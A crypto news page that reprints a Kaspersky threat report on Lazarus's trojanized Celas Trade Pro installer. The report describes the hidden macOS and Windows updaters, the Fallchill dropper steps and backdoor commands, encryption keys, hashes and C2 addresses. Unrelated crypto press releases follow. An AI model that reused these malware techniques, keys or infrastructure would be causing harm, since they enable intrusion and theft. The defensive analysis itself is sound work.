Lazarus hits cryptocurrency exchange with fake installer and macOS malware 9833

Kaspersky Lab has been assisting with incident response efforts. While investigating a cryptocurrency exchange attacked by Lazarus, we made an unexpected discovery. The victim had been infected with the help of a trojanized cryptocurrency trading application, which had been recommended to the company over email. It turned out that an unsuspecting employee of the company had willingly downloaded a third-party application from a legitimate looking website and their computer had been infected with malware known as Fallchill, an old tool that Lazarus has recently switched back to. There have been multiple reports on the reappearance of Fallchill, including one from US-CERT.

To ensure that the OS platform was not an obstacle to infecting targets, it seems the attackers went the extra mile and developed malware for other platforms, including for macOS. A version for Linux is apparently coming soon, according to the website. It’s probably the first time we see this APT group using malware for macOS.

The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms.

Trojanized cryptocurrency trading application

Thanks to Kaspersky Lab’s malicious-behavior detection technology, implemented in its endpoint security software, we were able to reassemble the stages of infection and trace them back to their origin. This helped us understand that one of Lazarus’ victims was infected with malware after installing a cryptocurrency trading program. We also confirmed that the user installed this program via a download link delivered over email.

Trojanized trading application for Windows

Including malicious code into distributed software and putting that on a website would be too obvious. Instead, the attackers went for a more elaborate scheme: the trojan code was pushed out in the form of an update for a trading application.

A legitimate-looking application called Celas Trade Pro from Celas Limited showed no signs of malicious behaviour and looked genuine. This application is an all-in-one style cryptocurrency trading program developed by Celas.

Screenshot of Celas Trade Pro

When we started this research, any user could download the trading application from the Celas website. Checking the installation package downloaded from the website confirmed the presence of a very suspicious updater.

Installation package download page

We have analyzed the following Windows version of the installation package:

MD5: 9e740241ca2acdc79f30ad2c3f50990a
File name: celastradepro_win_installer_1.00.00.msi
File type: MSI installer
Creation time: 2018-06-29 01:16:00 UTC

At the end of the installation process, the installer immediately runs the Updater.exe module with the “CheckUpdate” parameter. This file looks like a regular tool and most likely will not arouse the suspicion of system administrators. After all, it even contains a valid digital signature, which belongs to the same vendor. But the devil is in the detail, as usual.

The code writer developed this project under the codename “jeus”, which was discovered in a PDB path included in the updater and used as unique HTTP multipart message data separator string. Because of this, and the fact that the attacked platforms include Apple macOS, we decided to call this Operation AppleJeus.

Properties of the shady updater tool included in the package are:

MD5: b054a7382adf6b774b15f52d971f3799
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Known file name: %Program Files%\CelasTradePro\Updater.exe
Link Time: 2018-06-15 10:56:27 UTC
Build path: Z:\jeus\downloader\downloader_exe_vs2010\Release\dloader.pdb

The main purpose of Updater.exe is to collect the victim’s host information and send it back to the server. Upon launch, the malware creates a unique string with the format string template “%09d-%05d” based on random values, which is used as a unique identifier of the infected host. This malware collects process lists, excluding “[System Process]” and “System” processes and gets the exact OS version from the registry value at “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion”. It seems that such values only exist from Windows 10, so we assume that the author developed and tested it on Windows 10.

  • ProductName: Windows OS version
  • CurrentBuildNumber: Windows 10 build version
  • ReleaseID: Windows 10 version information
  • UBR: Sub version of Windows 10 build
  • BuildBranch: Windows 10 build branch information

The code encrypts the collected information with the hardcoded XOR key (“Moz&Wie;#t/6T!2y“) before uploading it to the server.

Data encryption routine

The code sends the victim’s information to a webserver using HTTP and the following URL:
www.celasllc[.]com/checkupdate.php

The server is a legitimate looking website owned by the developer of the program: Celas LLC. At this point we were not able to conclude with high confidence whether the server was compromised by the threat actor or had belonged to the threat actor from the beginning. To learn more about the server, please read the “Infrastructure” section below.

The malware used a hardcoded User-Agent string “Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)” and fixed a multipart form data separator string “jeus“.

Using encryption, the custom separator string wouldn’t be a red flag for a legitimate application, but sending a request with the context-irrelevant string “get_config”, as well as uploading collected system information as “temp.gif”, mimicking a GIF image with a magic number in the header, definitely made us raise our eyebrows.

Communication with the C2 server

After successfully uploading data, the updater checks the server response. If the server responds with HTTP code 300, it means the updater should keep quiet and take no action. However, if the response is HTTP code 200, it extracts the payload with base64 and decrypts it using RC4 with another hardcoded key (“W29ab@ad%Df324V$Yd“). The decrypted data is an executable file that is prepended with the “MAX_PATHjeusD” string.

During our research, we found other similar files. One was created on August 3rd and another on August 11th. The PDB path shows that the author keeps improving this updater tool, apparently forked from some stable version released on July 2, 2018 according to the internal directory name.

Additional trojanized sample #1 Additional trojanized sample #1
Installation package MD5 4126e1f34cf282c354e17587bb6e8da3 0bdb652bbe15942e866083f29fb6dd62
Package creation date 2018-08-03 09:57:29 2018-08-13 0:12:10
Dropped updater MD5 ffae703a1e327380d85880b9037a0aeb bbbcf6da5a4c352e8846bf91c3358d5c
Updater creation date 2018-08-03 09:50:08 2018-08-11 7:28:08
Updater Build path H:\DEV\TManager\DLoader\20180702\dloader\WorkingDir\Output\00000009\Release\dloader.pdb H:\DEV\TManager\DLoader\20180702\dloader\WorkingDir\Output\00000006\Release\dloader.pdb

Note the TManager directory in the PDB path from the table. It will pop up again in another unexpected place later.

Trojanized trading program for macOS

For macOS users, Celas LLC also provided a native version of its trading app. A hidden “autoupdater” module is installed in the background to start immediately after installation, and after each system reboot. It keeps contacting the command and control (C2) server in order to download and run an additional executable from the server. The communication conforms to the Windows version of the updater and is disguised as an image file upload and download, while carrying encrypted data inside.

We have analyzed the following installation file:

MD5: 48ded52752de9f9b73c6bf9ae81cb429
File Size: 15,020,544 bytes
File Type: DMG disk image
Known file name: celastradepro_mac_installer_1.00.00.dmg
Date of creation: 13 July 2018

Once the Cellas Trade Pro app is installed on macOS, it starts the Updater application on the system load via a file named “.com.celastradepro.plist” (note that it starts with a dot symbol, which makes it unlisted in the Finder app or default Terminal directory listing). The “Updater” file is passed the “CheckUpdate” parameter on start.

Celas Trade Pro app plist file (Apple Property List)

The command-line argument “CheckUpdate” looks redundant from a code analysis perspective: there is no other argument that the application expects. In the absence of all arguments, it doesn’t do anything and quits. This may or may not be way to trick sandboxes that could automatically execute this trojan updater, with no suspicious activity produced without such a “secret” extra argument. The choice of a benign string such as “CheckUpdate” helps it to hide in plain sight of any user or administrator looking into running processes.

The trojanized updater works similar to the Windows version in many ways. Both applications are implemented using a cross-platform QT framework. Upon launch, the downloader creates a unique identifier for the infected host using a “%09d-%06d” format string template. Next, the app collects basic system information, which for macOS is done via dedicated QT classes:

  • Host name
  • OS type and version
  • System architecture
  • OS kernel type and version

The process of encrypting and transferring data is the same as in the Windows version. This information is XOR-encrypted with hardcoded 16-byte static key “Moz&Wie;#t/6T!2y”, prepended with GIF89a header and uploaded to the C2 server via HTTP POST and the following URL:

https://www.celasllc[.]com/checkupdate.php

POST request template strings

The module relies on a hardcoded User-Agent string for macOS:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36

Once the server replies, it checks the HTTP response code. HTTP response code 300 indicates that the server has no task for the updater and the application terminates immediately. If the HTTP response is code 200, then the updater gets the data in the response, decodes it from base64 encoding and decrypts it using RC4 with the hardcoded static key “W29ab@ad%Df324V$Yd“. It calculates the MD5 of the decoded and decrypted data, which is compared to a value stored inside, to verify the integrity of the transferred file. After that, the payload is extracted and saved to a hardcoded file location “/var/zdiffsec“, sets executable permissions for all users and starts the app with another secret hardcoded command-line argument “bf6a0c760cc642“. Apparently the command-line argument is the way to prevent the detection of its malicious functionality via sandboxes or even reverse engineering. We have previously seen this technique adopted by Lazarus group in 2016 in attacks against banks. As of 2018, it is still using this in almost every attack we investigated.

Downloaded payload

According to data from Kaspersky Security Network, the threat actor delivered the malicious payload using one of the shadowy updaters described above. We found a malicious file created at the same host:

MD5: 0a15a33844c9df11f12a4889ae7b7e4b
File Size: 104,898,560 bytes
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Known file name: C:\Recovery\msn.exe
Link time: 2018-04-19 13:30:19

Note the unusually large size for an executable file. We believe that it was inflated with junk data on purpose to prevent easy download or transfer over the internet.

Searching for the reason for the malware’s appearance on the system revealed that there was an additional process responsible for producing several files before this malware was launched, suggesting a trojan dropper in action. The main function of this malware is to implant the Fallchill backdoor loader linked to several files. Upon launch, the malware checks one of the command-line arguments passed to it. The malware chooses one of the service names located in the following registry value as a disguise:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\netsvcs

This value includes a list of several dozen standard system service names.

The randomly chosen service name is used to name the dropped file and newly registered Windows service. Let’s refer to this randomly chosen service name as [service]. The malware contains references to several files inside:

  • The file passed as argument: contains a 16-byte key
  • msncf.dat: Encrypted configuration data
  • msndll.tmp: Encrypted Fallchill loader
  • msndll.dat: Encrypted Fallchill backdoor (payload for the loader)
  • [service]svc.dll: Fallchill backdoor loader
  • [service].dat: Copy of msndll.dat

A mix of the above-mentioned files produces the final backdoor known as Fallchill. A more detailed procedure for technical specialists is as follows:

  1. Check whether the command-line argument points to a file of 16 byte size.
  2. Read the file passed via the command-line argument. The contents of this file contains a crypto key, which we will call the main key.
  3. Open the msncf.dat file (configuration file). If the file size equals 192 bytes, read the content of the file.
  4. Open msndll.tmp file and decrypt it using the main key.
  5. Create the [service]svc.dll file and fill it with pseudo-random data.
    1. The malware fills the file with 10,240 bytes of pseudo-random data, and iterates (rand() % 10 + 10240) times. This is why it produces files which are at least 104,851,000 bytes.
  6. Copy the 16-byte main key at the end of the [service]svc.dll file.
  7. Encrypt the [service].dat file name with the main key and append it at the end of [service]svc.dll.
  8. Overwrite the beginning of [service]svc.dll with data decrypted from msndll.tmp.
  9. Move msndll.dat file to [service].dat.
  10. Delete temporary files: msndll.tmp, msncf.dat, msndll.log.
  11. Timestamp [service]svc.dll and [service].dat files.
  12. Register [service]svc.dll as a Windows service.
  13. Save a copy of data from msncf.dat file in the following registry value
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskConfigs\Description.

Infection process diagram

Fallchill backdoor loader

We confirmed that the following malware was created on the infected host using the method described above:

Fallchill backdoor loader:

MD5: e1ed584a672cab33af29114576ad6cce
File Size: 104,878,356 bytes
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Known file name: C:\Windows\system32\uploadmgrsvc.dll
Link time: 2018-01-18 01:56:32

Encrypted Fallchill backdoor:

MD5: d8484469587756ce0d10a09027044808
File Size: 143,872 bytes
File Type: encrypted data
Known file name: C:\Windows\system32\uploadmgr.dat

Upon starting, uploadmgrsvc.dll reads 276 bytes from the end of its own executable file. The first 16 bytes of this 276-byte data are used as a decryption key, and the remaining 260 bytes contain the encrypted file path used by the backdoor.

Data at the end of the loader module

After decryption of the last 260-bytes, the malware retrieves the name or path of the file that contains the actual backdoor body in encrypted form.

Decrypted file name in the end of loader module

The malware reads the specified file and decrypts it using the same decryption routine. This is how the executable code of the backdoor is produced in memory and executed by the loader. Below is the meta information about the decrypted final payload in memory:

MD5: d7089e6bc8bd137a7241a7ad297f975d
File Size: 143,872 bytes
File Type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Link Time: 2018-03-16 07:15:31

We can summarize the Fallchill backdoor loading process as follows:

Loading the Fallchill backdoor

As mentioned previously, the final payload belongs to a Fallchill malware cluster formerly attributed to the Lazarus APT group. Upon launching, this malware resolves the API function addresses at runtime, and reads the C2 server address from the registry value created during the installation stage:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskConfigs\Description

If there is no configuration value, the malware falls back to a default C2 server address.

  • 196.38.48[.]121
  • 185.142.236[.]226

This is a full-featured backdoor that contains enough functions to fully control the infected host. Some of its network protocol commands are described below.

Command ID Description
0x8000 Write current time and configuration data to registry key
0x8001 Send configuration data
0x8002 Replace configuration data in the fixed registry value
0x8003 Execute Windows command, store output in temp file and upload contents to C2
0x8006 Show current working directory
0x8007 Change current working directory
0x8008 Collect process information
0x8009 Terminate process
0x8010 Start new process
0x8011 Create process with security context of the current user
0x8012 Connect to specified host/port
0x8013 Get drive information
0x8014 Directory listing
0x8015 Search a file
0x8019 Write data to a specified file
0x8020 Read contents of specified file and upload to C2 server
0x8021 Compress multiples files to a temp file (name start with ZD) and upload to C2
0x8023 Wipe specific file
0x8025 Copy file time from another file time (timestamping)
0x8026 Shutdown malware service and self-delete
0x8043 Send “Not Service” unicode string to C2 server (communication test?).

This set of capabilities is very common for many Lazarus backdoors, which have been seen in other attacks against banks and financial industry in the past years.

Infrastructure

While working on the incident of the cryptocurrency company’s breach, we were curious about the legal status of the Celas LLC company that developed this trojanized trading application.

Celas LLC main homepage.

The website had a valid SSL certificate issued by Comodo CA. However, note that the certificate from this webserver mentions “Domain Control Validated”, which is a weak security verification level for a webserver. It does not mean validation of the identity of the website’s owner, nor of the actual existence of the business. When certification authorities issue this kind of certificate they only check that the owner has a certain control over the domain name, which can be abused in certain ways.

Below is the WHOIS record of the “celasllc.com” domain. The domain name was registered by an individual named “John Broox” with registrant email address “johnbroox200@gmail[.]com”.

The same name of “John Broox” was used inside the installation package of the macOS version of the trading application. The Info.plist properties file describes the package as follows:

It looks at first sight like a legitimate WHOIS record, but something doesn’t really add up here. The domain celasllc.com was the only domain registered with this email address and was exclusively used for domain registration.

The registrant used the Domain4Bitcoins service to register this domain, apparently paying with cryptocurrency. According to open-source intelligence, the address of the WHOIS information is fake, unless it’s the owner of a ramen shop running a cryptocurrency exchange software development studio on the side.

View of the location referred in the WHOIS record. Image source: Google Maps.

The server hosting celasllc.com (185.142.236.213) belongs to the Blackhost ISP in the Netherlands.

WHOIS record of cellasllc.com server

Coincidentally, the Fallchill malware authors also preferred to use the same hosting company to host their C2 server. Moreover, the Celas LLC web server and one of the C2 servers of the Fallchill malware are located in the same network segment of this ISP:

  • Celas LLC infrastructure:
    • 185.142.236.213Netherlands Blackhost Ltd. AS174 COGENT-174
  • Fallchill malware C2 server:
    • 196.38.48[.]121: South Africa Internet Solutions AS3741
    • 185.142.236[.]226: Netherlands Blackhost Ltd. AS174 COGENT-174
  • Additional attacker’s server from telemetry
    • 80.82.64[.]91: Seychelles Incrediserve Ltd AS29073
    • 185.142.239[.]173: Netherlands Blackhost Ltd. AS174 COGENT-174

However, when you look into Celas Trading Pro application’s digital signature, including its “Updater”, you will find that this certificate was also issued by Comodo CA, which refers to a company address in the United States.

According to open-source data, this address doesn’t belong to a real business, and looks on maps like a meadow with a small forest and small real estate offering nearby.

Location of Cellas LLC, according to its digital certificate

Real estate history of that address

Pivoting the infrastructure a little further brings up some more suspicious things. It appears that the domain referred to two IPs, one of which was linked to a few other suspicious domains, according to PassiveDNS.

Cellas LLC linked infrastructure

The owners of the linked infrastructural elements preferred to use several interesting services for hosting domain registration. All these service providers offer a certain level of anonymity to their customers. Most of them accept Bitcoins as a main payment method to keep their customers anonymous. This is very uncommon for companies running a legitimate business.

Hosting services linked to Celas LLC:

  • Blackhost (https://black.host/)
  • Liberty VPS (https://libertyvps.net/)

Domain registration services linked to Celas LLC:

  • Domains4Bitcoins (https://www.domains4bitcoins.com/)
  • NameCheap (https://www.namecheap.com/)
  • ChangeIP (https://www.changeip.com/)
  • Njalla (https://njal.la/)

All the facts above can make the more sceptical among us doubt the intentions of Celas LLC and the legitimacy of this business. Of course, these facts alone would not be enough to accuse Celas LLC of committing a crime.

Attribution

Kaspersky Lab has previously attributed the Fallchill malware cluster to Lazarus group when it attacked the financial sector around the world. It was also confirmed by other security vendors, and the national CERT of US.

RC4 key from the older Fallchill

Fallchill malware uses a RC4 algorithm with a 16-byte key to protect its communications. The key extracted from the Fallchill variant used in the current attack is DA E1 61 FF 0C 27 95 87 17 57 A4 D6 EA E3 82 2B.

Current RC4 key of Fallchill

We were able to confirm that some of older Fallchill malware variants used exactly the same RC4 key. Below are Fallchill malware samples that used the same key (the compilation timestamp may indicate the date of malware creation).

MD5 Timestamp
81c3a3c5a0129477b59397173fdc0b01 2017-05-26 23:37:04
6cb34af551b3fb63df6c9b86900cf044 2017-06-09 17:24:30
21694c8db6234df74102e8b5994b7627 2017-11-07 17:54:19
5ad7d35f0617595f26d565a3b7ebc6d0 2015-10-24 01:52:11
c501ea6c56ba9133c3c26a7d5ed4ce49 2017-06-09 03:59:43
cafda7b3e9a4f86d4bd005075040a712 2017-11-07 17:54:33
cea1a63656fb199dd5ab90528188e87c 2017-06-12 19:25:31
6b061267c7ddeb160368128a933d38be 2017-11-09 17:18:06
56f5088f488e50999ee6cced1f5dd6aa 2017-06-13 08:17:51
cd6796f324ecb7cf34bc9bc38ce4e649 2016-04-17 03:26:56

Same C2 server with older Fallchill

We have confirmed that the C2 server addresses (196.38.48[.]121, 185.142.236[.]226) used in this attack have been used by the older variant of Fallchill.

MD5 Timestamp
94dfcabd8ba5ca94828cd5a88d6ed488 2016-10-24 02:31:18
14b6d24873f19332701177208f85e776 2017-06-07 06:41:27
abec84286df80704b823e698199d89f7 2017-01-18 04:29:29

Overlap of C2 infrastructure

Apparently, the attackers using the Fallchill malware continue to reuse code and C2 server infrastructure over and over again.

According to Kaspersky Security Network, Fallchill was not the only malware used in this attack. There was another backdoor that was used by the threat actor. We omit a full description of this backdoor in the current report to keep the write-up to an acceptable length, but we would like to highlight two important things discovered in it. First, this backdoor was created on 2018-07-12 and revealed an already familiar directory, “TManager”, which we previously saw in the Updater.exe application from the Cellas Trading Pro suite:

H:\DEV\TManager\all_BOSS_troy\T_4.2\T_4.2\Server_\x64\Release\ServerDll.pdb

Second, what is probably one of the most interesting findings to come from this additional backdoor was discovered hidden in hardcoded headers used to communicate with C2 server. The Accept-Language HTTP header string revealed a language code associated with North Korea. In our experience, this is something we normally don’t see in malware.

Accept-Language: ko-kp,ko-kr;q=0.8,ko;q=0.6,en-us;q=0.4,en;q=0.2

Accept-Language HTTP header value in the body of the backdoor

Conclusions

The Lazarus APT group’s continuous attacks on the financial sector are not much of a surprise to anyone. A lot of research has been done and published about such attacks. However, we think this case makes a difference. Recent investigation shows how aggressive the group is and how its strategies may evolve in the future.

First of all, Lazarus group has entered a new platform: macOS. There is steadily growing interest in macOS from ordinary users, especially in IT companies. Many developers and engineers are switching to using macOS. Apparently, in the chase after advanced users, software developers from supply chains and some high profile targets, threat actors are forced to have macOS malware tools. We believe that in the future Lazarus is going to support all platforms that software developers are using as a base platform, because compromising developers opens many doors at once.

We cannot say with full certainty whether Celas LLC was compromised and the threat actor abused it to push malware through an update mechanism. However, the multiple successful Lazarus attempts to compromise supply chain companies suggest that it will keep exploring this infection method. From all angles, the Celas LLC story looks like the threat actor has found an elaborate way to create a legitimate looking business and inject a malicious payload into a “legitimate looking” software update mechanism. Sounds logical: if one cannot compromise a supply chain, why not to make fake one?

This should be a lesson to all of us and a wake-up call to businesses relying on third-party software. Do not automatically trust the code running on your systems. Neither good looking website, nor solid company profile nor the digital certificates guarantee the absence of backdoors. Trust has to be earned and proven. Stay safe!

Previous ArticleNext Article

Lenfi reinforces trust with a second audit prior to mainnet launch 6223

In a move that underscores its commitment to unmatched security and transparency, Lenfi, a trailblazer in Cardano’s DeFi landscape, has announced the commencement of its second audit, paving the way for its much-anticipated mainnet debut. The upcoming six-week audit, conducted by industry experts TxPipe, marks a significant milestone in ensuring top-notch security for Lenfi’s innovative lending and borrowing protocol.

Simplifying DeFi: Lenfi’s user-centric approach

Lenfi stands out in the complex world of decentralized finance (DeFi) by making its lending and borrowing platform not only secure but also user-friendly. “Our goal is to demystify DeFi, making it accessible and safe for everyone,” says Mantas Andriuska, Co-founder of Lenfi. “This audit is more than a security check; it’s about building trust and delivering a seamless experience to our users.”

Building on a foundation of success

The decision to conduct a second audit follows the successful completion of an initial audit by AnastasiaLabs, which involved an in-depth review and optimization of Lenfi’s code. This rigorous process helped fortify Lenfi’s platform against potential vulnerabilities, setting a high standard in the DeFi sector.

In 2022, under its former name Aada Finance, the team’s commitment to robust security protocols was evident with two comprehensive audits by Vacuumlabs. Since its launch on September 13, 2022, Lenfi’s V1 lending protocol has operated flawlessly, a testament to the team’s meticulous approach.

What sets Lenfi apart?

Lenfi distinguishes itself in the DeFi space with its unwavering commitment to safety and its open-source approach. Transitioning from a peer-to-peer model to a complex pooled lending system on Cardano, Lenfi underscores its dedication to security and transparency. This open-source philosophy not only ensures rigorous scrutiny but also fosters community trust and ongoing innovation in DeFi.

Enhancing user confidence through expert audits

Recognizing that a single audit is not the be-all and end-all of security, Lenfi adopts a multi-audit strategy. “Multiple audits mean diverse expert perspectives, leading to a more resilient platform,” Andriuska explains. TxPipe, as creators of the programming language used in Lenfi’s smart contracts, are uniquely positioned to provide comprehensive and insightful stress tests.

Looking ahead: A safer DeFi future

This second audit is more than a procedural step; it’s a reflection of Lenfi’s vision for a safer, more reliable DeFi ecosystem. As we move closer to the mainnet launch, Lenfi’s unwavering commitment to security, coupled with its innovative platform, positions it as a beacon of trust and efficiency in the dynamic world of DeFi.

Website: https://lenfi.io/
Twitter: https://twitter.com/LenfiOfficial
Testnet: https://testnet.lenfi.io/

Hex Trust Enables Custody For STASIS EURO (EURS) Stablecoin 5717

STASIS, the European fintech company behind the oldest EURO stablecoin EURS, announced the new integration with recognized digital asset custodian Hex Trust today. This integration enables Hex Trust to offer custodial services with EURS to its clients and reinforces Hex Trust’s ambition to diversify its digital assets offering.

Effective immediately, Hex Trust will allow its clients to safely store and manage EURS assets via their Hex Trust Custody solution. “We believe that this integration highlights the growing significance of EURS within the stablecoin realm. Major cryptocurrency players expect the demand for non-USD stablecoins to grow, and at STASIS, we strongly align with these predictions. This integration is a proof of that as our partnership with Hex Trust bolsters the expansion of the EURS Network, which brings together a diverse blend of crypto exchanges, DEXs, wallets, fiat on/off ramps, and various other services. We’re excited to team up with Hex Trust and enable top-tier EURS custody to Hex’s enterprise clients,” said Gregory Klumov, CEO at STASIS.

“The decision to onboard EURS aligns seamlessly with our vision and signifies another milestone for Hex Trust. By offering our 200+ institutional clients the ability to use EURS within our secure custody platform, Hex Safe, we reinforce our position as a trusted provider of comprehensive digital asset solutions. This partnership with STASIS highlights our commitment to meeting the evolving needs of our clients and addressing the growing demand for non-USD stablecoins. We are looking forward to providing top-tier EURS custody and contributing to the continued growth of the digital asset ecosystem,” said Giorgia Pellizzari, Head of Custody at Hex Trust.

EURS by STASIS is the oldest and the only fully compliant and regulated EURO stablecoin on the market with a 5-year track record, over 6B euros transferred on-chain across 5 major blockchains (more distributed ledgers planned), including Ethereum, Polygon, XRP, XDC and Algorand. With zero transaction failures and regular audits by BDO Malta, EURS stands out with its pristine regulatory and compliance status. All EURS assets are backed on a 1:1 basis, and collateral is stored at the Central Bank, mitigating commercial banking risks.

About Hex Trust

Established in 2018, Hex Trust is a fully licensed digital asset custodian dedicated to providing solutions for protocols, foundations, financial institutions, and the Web3 ecosystem. Get access to custody, DeFi, brokerage, and other services built on regulated infrastructure. Hex Trust has offices in Hong Kong, Singapore, Vietnam, Dubai, France and Italy.

About STASIS & EURS

STASIS is a European financial technology firm that develops customer-friendly instruments to enable institutional and retail customers to manage digital currencies and public blockchains for payments and settlements, e-commerce, and DeFi. The company issues, governs, and manages EURS, the only legal stablecoin in the EU, accessible in 175 countries and audited by BDO, one of the most renowned auditors in the world.

Alchemy Pay and zkMe – Transforming KYC With Zkme’s Innovative zkKYC Solution to Provide Privacy-Preserving and Compliant Onboarding 5593

Alchemy Pay and zkMe team up to bring groundbreaking privacy-preserving KYC solutions to onboard users in a compliant, safe and secure manner through the zkMe identity oracle.

Overview

  • zkMe is an end-to-end zk proof and decentralized identity oracle
  • Alchemy Pay will start accepting zkMe’s privacy-preserving KYC, AML, and compliance related onboarding services
  • Through this collaboration, the two companies prove it’s possible to merge the blockchain ethos of privacy and decentralization with incoming regulation

Despite the maturity of the internet and the awareness of privacy concerns, existing KYC solutions often impose archaic and risky procedures on users – a solution that often exposes the user’s information to employees and companies (such as easily accessible pictures of passports), while users have no control over how their data is shared with third-parties. The repetitive verification required across different platforms only exacerbates data exposure risks.

With zkMe providing an identity oracle, which treats each identity as a set of anonymized data points, all identity-based queries (from personal info such as KYC, to on and offline credentials such as medical licenses and social media prowess) can be packaged in a single oracle, privately.

Traditional KYC methods often create friction during onboarding, sacrifice user privacy, and impose security risks by storing personal data on centralized servers. As a leading payments gateway bridging fiat and crypto economies globally, Alchemy Pay is teaming up with zkMe to integrate cutting-edge zero-knowledge proof (ZKP) technology into its onboarding process. This collaboration will provide enhanced privacy, security and convenience for Alchemy Pay users worldwide.

How zkMe’s zkKYC innovates identity verification

zkMe’s zkKYC solution allows users to prove they meet verification criteria without exposing any personal information. Advanced cryptography converts identity data into anonymized proofs of the credential, which are then validated against predefined requirements. The KYC process then only reveals that the users meet the criteria, such as “is this user over 18,” and “which country is this user a citizen of,” without risking crucial information such as the picture of the passport, or the passport number, all while being compliant in most key jurisdictions.

The process ensures:

  • User privacy is safeguarded through end-to-end encryption and selective disclosure of information. No personal data is ever stored on centralized servers.
  • Security is bolstered by decentralizing computation and using threshold encryption across multiple parties. No single entity can access user data.
  • Regulatory compliance is maintained by enabling identity recovery if required by authorities.
  • Convenience is improved by enabling instant verifications that can be reused across services that deploy zkMe’s identity oracle. No more repetitive KYC processes.

By adopting zkKYC, Alchemy Pay reaffirms its commitment to user security and privacy. This integration paves the way for a more streamlined, trusted and regulatory-compliant onboarding experience.

Looking ahead, zkKYC opens up new possibilities for Alchemy Pay to expand its services while upholding privacy values. Potential use cases include permissioned DeFi, undercollateralized loans, loyalty programs, and more. By leveraging advanced cryptography, Alchemy Pay can cater to emerging Web3 markets while giving users control over their personal data. This collaboration with zkMe represents a monumental step towards the future of self-sovereign identity.

About zkMe

zkMe builds zk Identity Oracles for truly decentralized & anonymous cross-chain credential verifications.

No personal information is ever processed by anyone but the user themselves. Data leaks & misuse by the service provider are impossible; full interoperability & reusability result in a superior ID solution. zkMe’s is the only FATF compliant KYC provider to be fully decentralized, offering a full suite of products from anti-bit/anti-sybil, to KYC and more.

Apraemio: A Gold-Backed Cryptocurrency Project Gains Validation as HSBC Enters the Gold Tokenization Space 6509

Apraemio, a unique digital asset backed by gold, today announced that its exchange listing will be concluded by 2024, and the gold redemption programme will start by 2025.

“We are thrilled to see HSBC enter the gold tokenization space, as this further validates our belief that gold-backed cryptocurrencies are the future of asset-backed tokens,” said Dr. Zoltán Varga, CEO of Apraemio. “Our project is built on a strong foundation of trust and transparency, and we are proud to be at the forefront of this emerging industry.”

Apraemio is a gold-backed cryptocurrency project supported by its mother company, which owns 65 sq km of land in Mali, Africa. The conglomerate company, GGS, holds exclusive rights to mine one of the largest gold reserves in Mali, and it is committed to using blockchain technology to provide investors with a secure and transparent way to invest in gold.

“We are committed to providing investors with a reliable store of value in a world of volatile cryptocurrencies; that is pretty much what we have been doing in the last 15 years,” said Dr Varga, the CEO of one of the most renowned investment gold companies – called Arteus Capital – in the Central European region, which has been active in the market for over a decade.

The Apraemio project is currently in the pre-sale phase, and the company plans to list its tokens on major cryptocurrency exchanges in 2024. The project also includes launching a gold redemption programme and opening a small-scale mine on its roadmap for the following year.

“We are excited to share this news with the world and look forward to bringing Apraemio to market,” said Dr. Zoltan Varga. “We believe that our project has the potential to revolutionize both the gold and cryptocurrency market and provide everyone with a new and inclusive way to invest in this precious metal.”

About Apraemio

Apraemio is a gold-backed cryptocurrency project combining the best of both worlds – the heritage, stability and popularity of gold and blockchain technology’s innovation and financial freedom. The company holds exclusive rights to mine one of the largest gold reserves in Mali, Africa, and is committed to using blockchain technology to provide investors with a secure and transparent way to invest in gold.

Tipitek is expanding the capabilities for its clients 6490

Tipitek

Tipitek is a structural division of Cryptoves LLP with its own high-speed, reliable, and modern cryptocurrency platform. Since its launch, the entire Tipitek ecosystem has been continuously evolving, providing a reliable platform for working in the crypto industry. While there were previous announcements about expanding the range of tools, not all details were previously disclosed. As of today, Tipitek offers the opportunity to work not only with cryptocurrencies but also with tokenized stocks, indices, precious metals, commodities, and energy assets.

About Tipitek: Analyzing Tipitek’s operations, it can confidently be said that its creators have successfully combined the best elements: innovation, style, comfort, security, multifunctionality, stability, high speed, and more. Both beginners and experienced traders enjoy working here, as each sees benefits for themselves.

Tipitek offers several types of trading accounts, and the use of margin trading conditions allows for trading on growth.

Expansion of the Instrument List: This management decision now allows Tipitek clients to work with cryptocurrencies and other tokenized assets, stocks, indices, precious metals, commodities, and energy assets on a single platform. This significantly simplifies the life of an active trader and saves time. And we know that time plays a very important role in the lives of our clients.

So, Tipitek users can now trade:

  • Cryptocurrency pairs (crypto-USDT, crypto-crypto): Over 30 directions for trading bitcoins, stablecoins, altcoins. Flexible leverage.
  • Tokenized stocks: Over 150 positions of well-known global companies. Short-term and long-term strategies are available.
  • Tokenized indices: Availability of the most popular global trends. Compliance with underlying assets. Market turnover of over 1 trillion dollars per day.
  • Tokenized precious metals: Agreed, the inclusion of tokenized metals into operation is an excellent solution, as investments in precious metals are a classic for every investor.
  • Tokenized commodities: An impressive list of available tokenized goods (corn, wheat, beans, etc.). Compliance with all Chicago Mercantile Exchange quotations.
  • Tokenized energy assets: A rather bold decision, as tokenized energy assets are mainly dealt with by bold and experienced traders who know how to take risks. However, at the same time, it is an excellent way to earn effectively.

Thus, the development of Tipitek’s trading division is moving in the right direction. And against the backdrop of similar projects that started their activities around the same time as Tipitek, competitive advantages are clearly visible. Expanding the list of instruments is an excellent solution for further advancement, which will help attract new users and increase the opportunities for each active client, offering 6 types of trading accounts.

Tipitek represents a revolutionary milestone in the cryptocurrency industry. The company seamlessly integrates all the essential elements required for convenient and profitable cryptocurrency trading.

Discover the unparalleled advantages, features, and account options that Tipitek offers. This is the first thing that catches the attention of prospective users of any platform. They are interested in the minimum investment amount, fees, availability of leverage, savings accounts, or other perks.

Cryptoves LLP has chosen not to limit Tipitek to one or two types of trading accounts and has provided its clients with a total of six unique account types, each offering new opportunities for users.

What do they offer you?

All six types of client accounts at Tipitek differ in the deposit amount and the set of useful services. The company explains the variety of account types by noting that platform users work not only with cryptocurrencies but also with other digital assets, making it an excellent decision.

